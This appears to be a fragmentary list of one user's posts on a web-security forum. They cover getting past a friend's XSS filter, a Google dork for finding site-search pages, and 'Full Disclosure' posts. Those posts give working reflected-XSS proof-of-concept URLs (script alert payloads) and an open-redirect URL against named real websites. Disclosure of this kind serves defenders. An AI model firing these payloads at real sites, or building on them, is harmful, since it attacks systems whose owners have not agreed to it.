well, sorry to put an end to the party here, but he filters out < and > so it doesn't appear to me that i'll be able to exploit this part of the page. if only he hadn't gotten rid of the = sign.
Forum: XSS Info

i'm helping a buddy of mine secure his site against XSS, SQL injection, etc since it actually helps provide part of his livelihood. he wrote a filter for a couple pages to filter out html tags in attributes for the url string and such. long story short, i have just about figured out how to get around his efforts. he has a search text box on his site and when the search results are displayed it
Forum: XSS Info

although there are fewer posts on this forum than others i have been a member of, it seems to me that the quality of the information contained in these posts are much superior. also, i'm not sure what i want to learn about yet because i'm still fairly new to web app security. so i'm just happy to learn anything ;)
Forum: Projects

haha, no i'm not your grandma. this is what led me to those sites: intext:"site search" damn you google! *shaking fist*
Forum: Full Disclosure

http://www.dohistory.org/cgi-bin/htsearch?config=dohistory&restrict=&exclude=&words=bla</title><script>alert('xss')</script><title>&method=and&format=builtin-long&sort=score http://www.the-dma.org/cgi2/htsearch?config=the-dmahtdigwhole&restrict=&words='</title><script>alert('xss')</script><title>&method=and h
Forum: Full Disclosure

http://www.sothebysrealty.com/PageRedirect.aspx?url=http://www.disney.com
Forum: Full Disclosure

i'm definitely interested in more logs since i'm fairly new to web app security. keep em coming ;)
Forum: Full Disclosure